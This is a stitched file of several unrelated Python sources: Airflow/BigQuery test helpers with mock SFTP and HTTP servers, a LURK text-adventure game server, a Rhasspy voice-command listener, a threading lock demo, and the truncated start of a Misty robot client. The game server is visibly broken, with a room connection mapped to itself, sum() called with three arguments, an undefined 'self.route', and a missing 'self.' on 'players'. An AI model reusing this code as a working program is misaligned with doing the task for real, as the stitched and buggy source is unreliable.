def assert_dag_structure(self, expected: Dict, dag: DAG):
"""Assert the DAG structure.
:param expected: a dictionary of DAG task ids as keys and values which should be a list of downstream task ids.
:param dag: the DAG.
:return: None.
"""
expected_keys = expected.keys()
actual_keys = dag.task_dict.keys()
self.assertEqual(expected_keys, actual_keys)
for task_id, downstream_list in expected.items():
self.assertTrue(dag.has_task(task_id))
task = dag.get_task(task_id)
self.assertEqual(set(downstream_list), task.downstream_task_ids)
def assert_dag_load(self, dag_id: str, dag_file: str):
"""Assert that the given DAG loads from a DagBag.
:param dag_id: the DAG id.
:param dag_file: the path to the DAG file.
:return: None.
"""
with CliRunner().isolated_filesystem() as dag_folder:
if os.path.exists(dag_file):
shutil.copy(dag_file, os.path.join(dag_folder, os.path.basename(dag_file)))
dag_bag = DagBag(dag_folder=dag_folder)
dag = dag_bag.get_dag(dag_id=dag_id)
self.assertEqual({}, dag_bag.import_errors)
self.assertIsNotNone(dag)
self.assertGreaterEqual(len(dag.tasks), 1)
def assert_blob_exists(self, bucket_id: str, blob_name: str):
"""Assert whether a blob exists or not.
:param bucket_id: the Google Cloud storage bucket id.
:param blob_name: the blob name (full path except for bucket)
:return: None.
"""
# Get blob
bucket = self.storage_client.get_bucket(bucket_id)
blob = bucket.blob(blob_name)
self.assertTrue(blob.exists())
def assert_blob_integrity(self, bucket_id: str, blob_name: str, local_file_path: str):
"""Assert whether the blob uploaded and that it has the expected hash.
:param blob_name: the Google Cloud Blob name, i.e. the entire path to the blob on the Cloud Storage bucket.
:param bucket_id: the Google Cloud Storage bucket id.
:param local_file_path: the path to the local file.
:return: whether the blob uploaded and that it has the expected hash.
"""
# Get blob
bucket = self.storage_client.get_bucket(bucket_id)
blob = bucket.blob(blob_name)
result = blob.exists()
# Check that blob hash matches if it exists
if result:
# Get blob hash
blob.reload()
expected_hash = blob.crc32c
# Check actual file
actual_hash = crc32c_base64_hash(local_file_path)
result = expected_hash == actual_hash
self.assertTrue(result)
def assert_table_integrity(self, table_id: str, expected_rows: int = None):
"""Assert whether a BigQuery table exists and has the expected number of rows.
:param table_id: the BigQuery table id.
:param expected_rows: the expected number of rows.
:return: whether the table exists and has the expected number of rows.
"""
table = None
actual_rows = None
try:
table = self.bigquery_client.get_table(table_id)
actual_rows = table.num_rows
except NotFound:
pass
self.assertIsNotNone(table)
if expected_rows is not None:
self.assertEqual(expected_rows, actual_rows)
def assert_table_content(self, table_id: str, expected_content: List[dict] = None):
"""Assert whether a BigQuery table has any content and if expected content is given whether it matches the
actual content. The order of the rows is not checked, only whether all rows in the expected content match
the rows in the actual content.
The expected content should be a list of dictionaries, where each dictionary represents one row of the table,
the keys are fieldnames and values are values.
:param table_id: the BigQuery table id.
:param expected_content: the expected content.
:return: whether the table has content and the expected content is correct
"""
rows = None
actual_content = None
try:
rows = self.bigquery_client.list_rows(table_id)
actual_content = [dict(row) for row in rows]
except NotFound:
pass
self.assertIsNotNone(rows)
if expected_content is not None:
for row in expected_content:
self.assertIn(row, actual_content)
actual_content.remove(row)
self.assertListEqual(
[], actual_content, msg=f"Rows in actual content that are not in expected content: {actual_content}"
)
def assert_file_integrity(self, file_path: str, expected_hash: str, algorithm: str):
"""Assert that a file exists and it has the correct hash.
:param file_path: the path to the file.
:param expected_hash: the expected hash.
:param algorithm: the algorithm to use when hashing, either md5 or gzip crc
:return: None.
"""
self.assertTrue(os.path.isfile(file_path))
if algorithm == "gzip_crc":
actual_hash = gzip_file_crc(file_path)
else:
actual_hash = get_file_hash(file_path=file_path, algorithm=algorithm)
self.assertEqual(expected_hash, actual_hash)
def assert_cleanup(self, download_folder: str, extract_folder: str, transform_folder: str):
"""Assert that the download, extracted and transformed folders were cleaned up.
:param download_folder: the path to the DAGs download folder.
:param extract_folder: the path to the DAGs extract folder.
:param transform_folder: the path to the DAGs transform folder.
:return: None.
"""
self.assertFalse(os.path.exists(download_folder))
self.assertFalse(os.path.exists(extract_folder))
self.assertFalse(os.path.exists(transform_folder))
def setup_mock_file_download(
self, uri: str, file_path: str, headers: Dict = None, method: str = httpretty.GET
) -> None:
"""Use httpretty to mock a file download.
This function must be called from within an httpretty.enabled() block, for instance:
with httpretty.enabled():
self.setup_mock_file_download('https://example.com/file.zip', path_to_file)
:param uri: the URI of the file download to mock.
:param file_path: the path to the file on the local system.
:param headers: the response headers.
:return: None.
"""
if headers is None:
headers = {}
with open(file_path, "rb") as f:
body = f.read()
httpretty.register_uri(method, uri, adding_headers=headers, body=body)
class SftpServer:
"""A Mock SFTP server for testing purposes"""
def __init__(
self,
host: str = "localhost",
port: int = 3373,
level: str = "INFO",
backlog: int = 10,
startup_wait_secs: int = 1,
socket_timeout: int = 10,
):
"""Create a Mock SftpServer instance.
:param host: the host name.
:param port: the port.
:param level: the log level.
:param backlog: ?
:param startup_wait_secs: time in seconds to wait before returning from create to give the server enough
time to start before connecting to it.
"""
self.host = host
self.port = port
self.level = level
self.backlog = backlog
self.startup_wait_secs = startup_wait_secs
self.is_shutdown = True
self.tmp_dir = None
self.root_dir = None
self.private_key_path = None
self.server_thread = None
self.socket_timeout = socket_timeout
def _generate_key(self):
"""Generate a private key.
:return: the filepath to the private key.
"""
key = rsa.generate_private_key(public_exponent=65537, key_size=2048, backend=default_backend())
private_key_path = os.path.join(self.tmp_dir, "test_rsa.key")
with open(private_key_path, "wb") as f:
f.write(
key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption(),
)
)
return private_key_path
def _start_server(self):
paramiko_level = getattr(paramiko.common, self.level)
paramiko.common.logging.basicConfig(level=paramiko_level)
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.settimeout(self.socket_timeout)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
server_socket.bind((self.host, self.port))
server_socket.listen(self.backlog)
while not self.is_shutdown:
try:
conn, addr = server_socket.accept()
transport = paramiko.Transport(conn)
transport.add_server_key(paramiko.RSAKey.from_private_key_file(self.private_key_path))
transport.set_subsystem_handler("sftp", paramiko.SFTPServer, StubSFTPServer)
server = StubServer()
transport.start_server(server=server)
channel = transport.accept()
while transport.is_active() and not self.is_shutdown:
time.sleep(1)
except socket.timeout:
# Timeout must be set for socket otherwise it will wait for a connection forever and block
# the thread from exiting. At: conn, addr = server_socket.accept()
pass
@contextlib.contextmanager
def create(self):
"""Make and destroy a test SFTP server.
:yield: None.
"""
with CliRunner().isolated_filesystem() as tmp_dir:
# Override the root directory of the SFTP server, which is set as the cwd at import time
self.tmp_dir = tmp_dir
self.root_dir = os.path.join(tmp_dir, "home")
os.makedirs(self.root_dir, exist_ok=True)
StubSFTPServer.ROOT = self.root_dir
# Generate private key
self.private_key_path = self._generate_key()
try:
self.is_shutdown = False
self.server_thread = threading.Thread(target=self._start_server)
self.server_thread.start()
# Wait a little bit to give the server time to grab the socket
time.sleep(self.startup_wait_secs)
yield self.root_dir
finally:
# Stop server and wait for server thread to join
self.is_shutdown = True
if self.server_thread is not None:
self.server_thread.join()
def make_dummy_dag(dag_id: str, execution_date: pendulum.DateTime) -> DAG:
"""A Dummy DAG for testing purposes.
:param dag_id: the DAG id.
:param execution_date: the DAGs execution date.
:return: the DAG.
"""
with DAG(
dag_id=dag_id,
schedule_interval="@weekly",
default_args={"owner": "airflow", "start_date": execution_date},
catchup=False,
) as dag:
task1 = DummyOperator(task_id="dummy_task")
return dag
@dataclass
class Table:
"""A table to be loaded into Elasticsearch.
:param table_name: the table name.
:param is_sharded: whether the table is sharded or not.
:param dataset_id: the dataset id.
:param records: the records to load.
:param schema_prefix: the schema prefix.
:param schema_folder: the schema path.
"""
table_name: str
is_sharded: bool
dataset_id: str
records: List[Dict]
schema_prefix: str
schema_folder: str
def bq_load_tables(
*,
tables: List[Table],
bucket_name: str,
release_date: DateTime,
data_location: str,
):
"""Load the fake Observatory Dataset in BigQuery.
:param tables: the list of tables and records to load.
:param bucket_name: the Google Cloud Storage bucket name.
:param release_date: the release date for the observatory dataset.
:param data_location: the location of the BigQuery dataset.
:return: None.
"""
with CliRunner().isolated_filesystem() as t:
files_list = []
blob_names = []
# Save to JSONL
for table in tables:
blob_name = f"{table.table_name}.jsonl.gz"
file_path = os.path.join(t, blob_name)
list_to_jsonl_gz(file_path, table.records)
files_list.append(file_path)
blob_names.append(blob_name)
# Upload to Google Cloud Storage
success = upload_files_to_cloud_storage(bucket_name, blob_names, files_list)
assert success, "Data did not load into BigQuery"
# Save to BigQuery tables
for blob_name, table in zip(blob_names, tables):
if table.is_sharded:
table_id = bigquery_sharded_table_id(table.table_name, release_date)
else:
table_id = table.table_name
# Select schema file based on release date
schema_file_path = find_schema(table.schema_folder, table.schema_prefix, release_date)
if schema_file_path is None:
logging.error(
f"No schema found with search parameters: analysis_schema_path={table.schema_folder}, "
f"table_name={table.table_name}, release_date={release_date}"
)
exit(os.EX_CONFIG)
# Load BigQuery table
uri = f"gs://{bucket_name}/{blob_name}"
logging.info(f"URI: {uri}")
success = load_bigquery_table(
uri,
table.dataset_id,
data_location,
table_id,
schema_file_path,
SourceFormat.NEWLINE_DELIMITED_JSON,
)
if not success:
raise AirflowException("bq_load task: data failed to load data into BigQuery")
class HttpServer:
"""Simple HTTP server for testing. Serves files from a directory to http://locahost:port/filename"""
def __init__(self, directory: str):
"""Initialises the server.
:param directory: Directory to serve.
"""
self.directory = directory
self.process = None
self.host = "localhost"
self.port = find_free_port(host=self.host)
self.address = (self.host, self.port)
self.url = f"http://{self.host}:{self.port}/"
@staticmethod
def serve_(address, directory):
"""Entry point for a new process to run HTTP server.
:param address: Address (host, port) to bind server to.
:param directory: Directory to serve.
"""
os.chdir(directory)
server = ThreadingHTTPServer(address, SimpleHTTPRequestHandler)
server.serve_forever()
def start(self):
"""Spin the server up in a new process."""
# Don't try to start it twice.
if self.process is not None and self.process.is_alive():
return
self.process = Process(
target=HttpServer.serve_,
args=(
self.address,
self.directory,
),
)
self.process.start()
def stop(self):
"""Shutdown the server."""
if self.process is not None and self.process.is_alive():
self.process.kill()
self.process.join()
@contextlib.contextmanager
def create(self):
"""Spin up a server for the duration of the session."""
self.start()
try:
yield self.process
finally:
self.stop()
|
game.py
|
from game_components import Character, Room, Loot
# from models import Session, Room, Connection, Monster, Loot
from player import Player
from LURKp import LURKprot
from random import randint
import queue, threading, time, models
class Game:
def __init__(self):
self.settings = {
'landlord': 'Mr. Rowanitz',
'start_stat_limit': 100,
'start_room': 1,
'returning_room': 5,
'stash_player_after': 600
}
self.actions = {
2: self.change_room,
3: self.stage_fight,
4: self.stage_pvp_fight,
5: self.loot,
6: self.start_player,
12: self.stash_player
}
self.rooms = {}
self.players = {}
self.queue = queue.Queue() # Queue of dictionaries to process in game_loop #
self.remove = queue.Queue() # Queue of Player objects to stash on socket error #
self.load_map()
self.lurk = LURKprot()
self.thread = threading.Thread(target = self.game_loop)
self.thread.start()
def load_map(self): ### Loads Rooms, Connections, Monsters, and Lootables from database ###
session = models.Session()
rooms = session.query(models.Room).all()
connections = session.query(models.Connection).all()
monsters = session.query(models.Monster).all()
lootables = session.query(models.Loot).all()
for room in rooms:
number, name, desc = room.id, room.name, room.description
self.rooms[number] = Room(number, name, desc)
for connection in connections:
room1, room2 = connection.room1, connection.room1
self.rooms[room1].connections.append(room2)
for monster in monsters:
name, attack, defense, regen, health, gold, room, desc = monster.name, monster.attack, monster.defense, monster.regen, monster.health, monster.gold, monster.room, monster.description
self.rooms[room].monsters[name] = Character(name, attack, True, True, True, True, True, defense, regen, health, gold, room, desc)
for lootable in lootables:
room, name, value, rewards, message = lootable.room, lootable.name, lootable.value, lootable.rewards, lootable.message
self.rooms[room].lootables.append(Loot(room, name, value, rewards, message))
def game_loop(self):
while True:
game_queue_size = self.queue.qsize()
if game_queue_size: print('Processing', game_queue_size, 'actions...')
for _ in range(game_queue_size):
action = self.queue.get() # Return a tuple of (player.name, message_dict)
action_type = action[1]['type']
self.route[action_type](action)
remove_queue_size = self.remove.qsize()
if remove_queue_size: print('Processing', remove_queue_size, 'removals...')
for _ in range(remove_queue_size):
player, time_added = self.remove.get()
if time.time() - time_added >= self.settings['stash_player_after']:
self.stash_player((player, {}))
def new_conn(self, conn): ### Passes conn to static method LURKprot.decode(), returns success or failure on player creation ###
message_dict = LURKprot.decode(conn = conn)
if message_dict and 'type' in message_dict and message_dict['type'] == 10:
self.new_player(conn, message_dict)
return True
else:
return False
def new_player(self, conn, characer_dict): ### Checks availability of name or innactive Player object, creates/updates Player or responds with error message ###
name = characer_dict['name']
if name in self.players:
try: players[name].conn.send(bytes(1)) # attempt writing to the socket to see if it's alive
except:
print('Found existing player with broken conn, replacing conn...')
self.players[name].conn = conn
return
error_message = self.lurk.get_err_message(2)
self.lurk.encode(error_message, conn = conn)
# elif player in database: # This will check long-term player storage
else:
stats_total = sum(characer_dict['attack'], characer_dict['defense'], characer_dict['regen'])
stats_limit = self.settings['start_stat_limit']
if stats_total == stats_limit:
self.players[name] = Player(self, conn, characer_dict = characer_dict)
else:
for stat in ('attack', 'defense', 'regen'): # recalculates each stat as a ratio and multiplies it by the game stat limit #
characer_dict[stat] = characer_dict[stat] / stats_total * stats_limit
stats_total = sum(characer_dict['attack'], characer_dict['defense'], characer_dict['regen'])
stats_delta = stats_limit - stats_total
print(stats_delta)
for i in [i for i in range(stats_delta)][::-1]:
for stat in ('attack', 'defense', 'regen'):
if not i: break
characer_dict[stat] += 1 * (i / abs(i))
self.players[name] = Player(self, conn, characer_dict = characer_dict)
def start_player(self, action): ### Updates player.character to indicate 'started' and adds player to the appropriate room ###
name, message_dict = action
player = self.players[name]
player.character.started = True
player.character.room = self.settings['start_room']
self.rooms[self.settings['start_room']].append(name)
def stash_player(self, action): ### Removes Player object from players and current room, adds or updates player record in long-term storage ###
name, message_dict = action
fair_well = self.lurk.get_chat_message(self.settings['landlord'], name, 'Sad to see you going so sooooon. Fair well!')
self.players[name].send_queue.put(fair_well)
self.players[name].character.started = False
self.players[name].character.ready = False
self.players[name].active = False
def change_room(self, action): ### Checks that new room is a connection of current room, removes player from current room and adds to new room ###
name, message_dict = action
player = self.players[name]
new_room = message_dict['room']
current_room = player.character['room']
if new_room in self.rooms[current_room].connections:
self.rooms[current_room].remove(player)
self.update_room(current_room)
self.rooms[new_room].append(player)
self.update_room(new_room)
player.character.room = new_room
def update_room(self, room): ### Sends updated characters, connections, and other info to all players in room ###
current_room = self.rooms[room].get_dict()
player_characters = [self.players[i].character.get_dict() for i in self.rooms[room].players]
monster_characters = [i.get_dict() for i in self.rooms[room].monsters.values()]
connecting_rooms = [self.rooms[i].get_dict() for i in self.rooms[room].connections.values()]
for player in self.rooms[room].players:
self.players[player].send_queue.put(current_room)
for update_list in (player_characters, monster_characters, connecting_rooms):
self.players[player].send_queue.put(update_list)
def process_fight(self, room, players_list, monsters_list = None): ### Calculates attack and damage taken for each character's turn, finally calls self.update_room ###
if monsters_list: # whole room fight
for character in players_list: # Each player attacks first
attack = character['attack']
for character in monsters_list:
if character['health'] > 0:
calc_attack = randint(int(attack * 0.75), int(attack * 1.25)) # consider moving this above the for loop if functionality is slow #
damage_taken = calc_attack - character['defense']
self.rooms[room].monsters[character['name']].health -= damage_taken
for character in monsters_list: # Then monsters attack
attack = character['attack']
for character in players_list:
calc_attack = randint(int(attack * 0.5), attack) # consider moving this above the for loop if functionality is slow #
damage_taken = calc_attack - character['defense']
self.players[character['name']].character.health -= damage_taken
else: # pvp fight
player1, player2 = players_list
calc_attack = randint(int(player1['attack'] * 0.75), int(player1['attack'] * 1.25))
damage_taken = calc_attack - player2['defense']
self.players[player2['name']].character.health -= damage_taken
calc_attack = randint(int(player2['attack'] * 0.75), int(player2['attack'] * 1.25))
damage_taken = calc_attack - player1['defense']
self.players[player1['name']].character.health -= damage_taken
self.update_room(room)
def stage_fight(self, action): ### Prepares character list for room, passes characters to calculate_attack ###
name, message_dict = action
room = self.players[name].character.room
if self.rooms[room].monsters:
players_list = self.rooms[room].players.copy()
players_list.remove(name)
players_list.insert(0, name)
players_list = [self.players[i].character.get_fight_stats() for i in players_list]
players_list = [i for i in players_list if i and i['health'] > 0]
monsters_list = [i.get_fight_stats() for i in self.rooms[room].monster.values()]
self.process_fight(room, players_list, monsters_list)
else:
message_dict = self.lurk.get_err_message(3)
self.players[name].send_queue.put(message_dict)
def stage_pvp_fight(self, action): ### Commences attack sequence, calculating attack and damage taken for each character's turn, and finally calls self.update_room ###
name, message_dict = action
target = message_dict['name']
room = message_dict['room']
if target in self.rooms[room].players:
players_list = [name, target]
players_list = [self.players[i].character.get_fight_stats() for i in players_list]
self.process_fight(room, players_list)
else:
message_dict = self.lurk.get_err_message(6) # text = 'Target player not in room'
self.players[name].send_queue.put(message_dict)
def loot(self, action):
name, message_dict = action
target = message_dict['name']
if self.players[name].character.room == self.players[target].character.room:
self.players[name].character.gold += self.players[target].character.gold
else:
message_dict = self.lurk.get_err_message(6)
self.players[name].send_queue.put(message_dict)
|
command_listener.py
|
"""Support for voice command recording."""
import json
import math
import os
import subprocess
import threading
import uuid
from datetime import timedelta
from typing import Any, Dict, List, Optional, Type
import webrtcvad
from rhasspy.actor import RhasspyActor, WakeupMessage
from rhasspy.events import (AudioData, ListenForCommand, MqttMessage,
MqttSubscribe, StartStreaming, StopStreaming,
VoiceCommand)
from rhasspy.utils import convert_wav
# -----------------------------------------------------------------------------
def get_command_class(system: str) -> Type[RhasspyActor]:
"""Return class type for profile command listener."""
assert system in ["dummy", "webrtcvad", "command", "oneshot", "hermes"], (
"Unknown voice command system: %s" % system
)
if system == "webrtcvad":
# Use WebRTCVAD locally
return WebrtcvadCommandListener
if system == "command":
# Use external program
return CommandCommandListener
if system == "oneshot":
# Use one-shot listener locally
return OneShotCommandListener
if system == "hermes":
# Use MQTT listener
return HermesCommandListener
# Use dummy listener as a fallback
return DummyCommandListener
# -----------------------------------------------------------------------------
class DummyCommandListener(RhasspyActor):
"""Always sends an empty voice command."""
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
if isinstance(message, ListenForCommand):
self.send(message.receiver or sender, VoiceCommand(bytes()))
# -----------------------------------------------------------------------------
# webrtcvad based voice command listener
# https://github.com/wiseman/py-webrtcvad
# -----------------------------------------------------------------------------
class WebrtcvadCommandListener(RhasspyActor):
"""Listens to microphone for voice commands bracketed by silence."""
def __init__(self) -> None:
RhasspyActor.__init__(self)
self.after_phrase: bool = False
self.buffer: bytes = bytes()
self.buffer_count: int = 0
self.chunk: bytes = bytes()
self.chunk_size: int = 960
self.handle = True
self.in_phrase: bool = False
self.min_phrase_buffers: int = 0
self.min_sec: float = 2
self.receiver: Optional[RhasspyActor] = None
self.recorder: Optional[RhasspyActor] = None
self.sample_rate: int = 16000
self.seconds_per_buffer: float = 0
self.settings: Dict[str, Any] = {}
self.silence_buffers: int = 0
self.silence_sec: float = 0.5
self.speech_buffers: int = 5
self.speech_buffers_left: int = 0
self.throwaway_buffers: int = 10
self.throwaway_buffers_left: int = 0
self.timeout_sec: float = 30
self.vad_mode: int = 0
self.vad: Optional[webrtcvad.Vad] = None
self.timeout_id: str = ""
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.recorder = self.config["recorder"]
self.settings = self.profile.get("command.webrtcvad")
self.sample_rate = self.settings["sample_rate"] # 16Khz
self.chunk_size = self.settings["chunk_size"] # 10,20,30 ms
self.vad_mode = self.settings["vad_mode"] # 0-3 (aggressiveness)
self.min_sec = self.settings["min_sec"] # min seconds that command must last
self.silence_sec = self.settings[
"silence_sec"
] # min seconds of silence after command
self.timeout_sec = self.settings[
"timeout_sec"
] # max seconds that command can last
self.throwaway_buffers = self.settings["throwaway_buffers"]
self.speech_buffers = self.settings["speech_buffers"]
self.seconds_per_buffer = self.chunk_size / self.sample_rate
self.vad = webrtcvad.Vad()
assert self.vad is not None
self.vad.set_mode(self.vad_mode)
self.handle = True
self.transition("loaded")
# -------------------------------------------------------------------------
def in_loaded(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in loaded state."""
if isinstance(message, ListenForCommand):
if message.timeout is not None:
# Use message timeout
self.timeout_sec = message.timeout
else:
# Use default timeout
self.timeout_sec = self.settings["timeout_sec"]
self._logger.debug("Will timeout in %s second(s)", self.timeout_sec)
self.receiver = message.receiver or sender
self.transition("listening")
self.handle = message.handle
self.send(self.recorder, StartStreaming(self.myAddress))
def to_listening(self, from_state: str) -> None:
"""Transition to listening state."""
self.timeout_id = str(uuid.uuid4())
self.wakeupAfter(timedelta(seconds=self.timeout_sec), payload=self.timeout_id)
# Reset state
self.chunk = bytes()
self.silence_buffers = int(
math.ceil(self.silence_sec / self.seconds_per_buffer)
)
self.min_phrase_buffers = int(math.ceil(self.min_sec / self.seconds_per_buffer))
self.throwaway_buffers_left = self.throwaway_buffers
self.speech_buffers_left = self.speech_buffers
self.in_phrase = False
self.after_phrase = False
self.buffer_count = 0
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, WakeupMessage):
if message.payload == self.timeout_id:
# Timeout
self._logger.warning("Timeout")
self.send(self.recorder, StopStreaming(self.myAddress))
self.send(
self.receiver,
VoiceCommand(
self.buffer or bytes(), timeout=True, handle=self.handle
),
)
self.buffer = bytes()
self.transition("loaded")
elif isinstance(message, AudioData):
self.chunk += message.data
if len(self.chunk) >= self.chunk_size:
# Ensure audio data is properly chunked (for webrtcvad)
data = self.chunk[: self.chunk_size]
self.chunk = self.chunk[self.chunk_size :]
# Process chunk
finished = self.process_data(data)
if finished:
# Stop recording
self.send(self.recorder, StopStreaming(self.myAddress))
# Response
self.send(
self.receiver,
VoiceCommand(self.buffer, timeout=False, handle=self.handle),
)
self.buffer = bytes()
self.transition("loaded")
def to_stopped(self, from_state: str) -> None:
"""Transition to stopped state."""
# Stop recording
self.send(self.recorder, StopStreaming(self.myAddress))
# -------------------------------------------------------------------------
def process_data(self, data: bytes) -> bool:
"""Process a single audio chunk."""
finished = False
self.buffer_count += 1
# Throw away first N buffers (noise)
if self.throwaway_buffers_left > 0:
self.throwaway_buffers_left -= 1
return False
# Detect speech in chunk
assert self.vad is not None
is_speech = self.vad.is_speech(data, self.sample_rate)
if is_speech and self.speech_buffers_left > 0:
self.speech_buffers_left -= 1
elif is_speech and not self.in_phrase:
# Start of phrase
self._logger.debug("Voice command started")
self.in_phrase = True
self.after_phrase = False
self.min_phrase_buffers = int(
math.ceil(self.min_sec / self.seconds_per_buffer)
)
self.buffer = data
elif self.in_phrase and (self.min_phrase_buffers > 0):
# In phrase, before minimum seconds
self.buffer += data
self.min_phrase_buffers -= 1
elif self.in_phrase and is_speech:
# In phrase, after minimum seconds
self.buffer += data
elif not is_speech:
# Outside of speech
if not self.in_phrase:
# Reset
self.speech_buffers_left = self.speech_buffers
elif self.after_phrase and (self.silence_buffers > 0):
# After phrase, before stop
self.silence_buffers -= 1
self.buffer += data
elif self.after_phrase and (self.silence_buffers <= 0):
# Phrase complete
self._logger.debug("Voice command finished")
finished = True
self.buffer += data
elif self.in_phrase and (self.min_phrase_buffers <= 0):
# Transition to after phrase
self.after_phrase = True
self.silence_buffers = int(
math.ceil(self.silence_sec / self.seconds_per_buffer)
)
return finished
# -----------------------------------------------------------------------------
# Command-line Voice Command Listener
# -----------------------------------------------------------------------------
class CommandCommandListener(RhasspyActor):
"""Command-line based voice command listener"""
def __init__(self):
RhasspyActor.__init__(self)
self.receiver: Optional[RhasspyActor] = None
self.command: List[str] = []
self.listen_proc = None
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
program = os.path.expandvars(self.profile.get("command.command.program"))
arguments = [
os.path.expandvars(str(a))
for a in self.profile.get("command.command.arguments", [])
]
self.command = [program] + arguments
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
if isinstance(message, ListenForCommand):
self.receiver = message.receiver or sender
self.listen_proc = subprocess.Popen(self.command, stdout=subprocess.PIPE)
def post_result() -> None:
# STDOUT -> WAV data
try:
wav_data, _ = self.listen_proc.communicate()
except Exception:
wav_data = bytes()
self._logger.exception("post_result")
# Actor will forward
audio_data = convert_wav(wav_data)
self.send(
self.myAddress, VoiceCommand(audio_data, handle=message.handle)
)
self.transition("listening")
# Wait for program in a separate thread
threading.Thread(target=post_result, daemon=True).start()
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, VoiceCommand):
# Pass downstream to receiver
self.send(self.receiver, message)
self.transition("started")
# -----------------------------------------------------------------------------
# One Shot Command Listener
# -----------------------------------------------------------------------------
class OneShotCommandListener(RhasspyActor):
"""Assumes entire voice command comes in first audio data"""
def __init__(self):
RhasspyActor.__init__(self)
self.receiver: Optional[RhasspyActor] = None
self.recorder: Optional[RhasspyActor] = None
self.timeout_sec: float = 30
self.handle: bool = False
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.recorder = self.config["recorder"]
self.timeout_sec = self.profile.get("command.oneshot.timeout_sec", 30)
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
if isinstance(message, ListenForCommand):
self.receiver = message.receiver or sender
self.handle = message.handle
self.transition("listening")
if message.timeout is not None:
# Use message timeout
timeout_sec = message.timeout
else:
# Use default timeout
timeout_sec = self.timeout_sec
self.send(self.recorder, StartStreaming(self.myAddress))
self.wakeupAfter(timedelta(seconds=timeout_sec))
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, AudioData):
assert self.receiver is not None
self.transition("started")
self.send(self.recorder, StopStreaming(self.myAddress))
self._logger.debug("Received %s byte(s) of audio data", len(message.data))
self.send(self.receiver, VoiceCommand(message.data, self.handle))
elif isinstance(message, WakeupMessage):
# Timeout
self._logger.warning("Timeout")
self.send(self.recorder, StopStreaming(self.myAddress))
self.send(
self.receiver, VoiceCommand(bytes(), timeout=True, handle=self.handle)
)
self.transition("started")
# -----------------------------------------------------------------------------
# MQTT-Based Command Listener (Hermes Protocol)
# https://docs.snips.ai/reference/hermes
# -----------------------------------------------------------------------------
class HermesCommandListener(RhasspyActor):
"""Records between startListening/stopListening messages."""
def __init__(self):
RhasspyActor.__init__(self)
self.receiver: Optional[RhasspyActor] = None
self.recorder: Optional[RhasspyActor] = None
self.mqtt: Optional[RhasspyActor] = None
self.handle: bool = False
self.buffer: bytes = bytes()
self.timeout_id: str = ""
self.timeout_sec: float = 30
self.site_ids: List[str] = []
self.start_topic = "hermes/asr/startListening"
self.stop_topic = "hermes/asr/stopListening"
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.recorder = self.config["recorder"]
self.mqtt = self.config["mqtt"]
self.timeout_sec = self.profile.get("command.hermes.timeout_sec", 30)
# Subscribe to MQTT topics
self.site_ids = self.profile.get("mqtt.site_id", "default").split(",")
self.send(self.mqtt, MqttSubscribe(self.start_topic))
self.send(self.mqtt, MqttSubscribe(self.stop_topic))
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
if isinstance(message, ListenForCommand):
self.buffer = bytes()
self.receiver = message.receiver or sender
self.handle = message.handle
self.transition("listening")
if message.timeout is not None:
# Use message timeout
timeout_sec = message.timeout
else:
# Use default timeout
timeout_sec = self.timeout_sec
self.send(self.recorder, StartStreaming(self.myAddress))
self.timeout_id = str(uuid.uuid4())
self.wakeupAfter(timedelta(seconds=timeout_sec), payload=self.timeout_id)
elif isinstance(message, MqttMessage):
# startListening
if message.topic == self.start_topic:
payload_json = json.loads(message.payload)
if payload_json.get("siteId", "default") in self.site_ids:
# Wake up Rhasspy
self._logger.debug("Received startListening")
self.send(self._parent, ListenForCommand())
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, AudioData):
self.buffer += message.data
elif isinstance(message, WakeupMessage):
if message.payload == self.timeout_id:
# Timeout
self._logger.warning("Timeout")
self.send(self.recorder, StopStreaming(self.myAddress))
self.send(
self.receiver,
VoiceCommand(self.buffer, timeout=True, handle=self.handle),
)
self.transition("started")
elif isinstance(message, MqttMessage):
if message.topic == self.stop_topic:
# stopListening
payload_json = json.loads(message.payload)
if payload_json.get("siteId", "default") in self.site_ids:
self._logger.debug("Received stopListening")
self.send(self.recorder, StopStreaming(self.myAddress))
self.send(
self.receiver, VoiceCommand(self.buffer, handle=self.handle)
)
self.transition("started")
|
03.lock_concurrent.py
|
import threading
lock = threading.Lock()
class Account:
def __init__(self, balance):
self.balance = balance
def draw(account, amount):
with lock:
if account.balance >= amount:
print(threading.current_thread().name,
"交易成功")
account.balance -= amount
print(threading.current_thread().name,
"余额", account.balance)
else:
print(threading.current_thread().name,
"交易失败,余额不足")
if __name__ == '__main__':
account = Account(1000)
ta = threading.Thread(name="ta", target=draw, args=(account, 800))
tb = threading.Thread(name="tb", target=draw, args=(account, 800))
ta.start()
tb.start()
|
mistyPy.py
|
import requests
import json
import threading
import time
import websocket
try:
import thread
except ImportError:
import _thread as thread
from random import*
class Robot:
def __init__(self,ip):
self.ip = ip
self.images_saved = []
self.audio_saved = []
self.faces_saved = []
self.backpack_instance = None
self.time_of_flight_instance = [None]*4
self.face_recognition_instance = None
self.available_subscriptions = ["SerialMessage", "TimeOfFlight","FaceRecognition","LocomotionCommand","HaltCommand","SelfState","WorldState"]
self.populateImages()
self.populateAudio()
self.populateLearnedFaces()
def changeLED(self,red,green,blue):
assert red in range(0,256) and blue in range(0,256) and green in range(0,256), " changeLED: The colors need to be in 0-255 range"
requests.post('http://'+self.ip+'/api/led',json={"red": red,"green": green,"blue": blue})
def changeImage(self,image_name,timeout=5):
if image_name in self.images_saved:
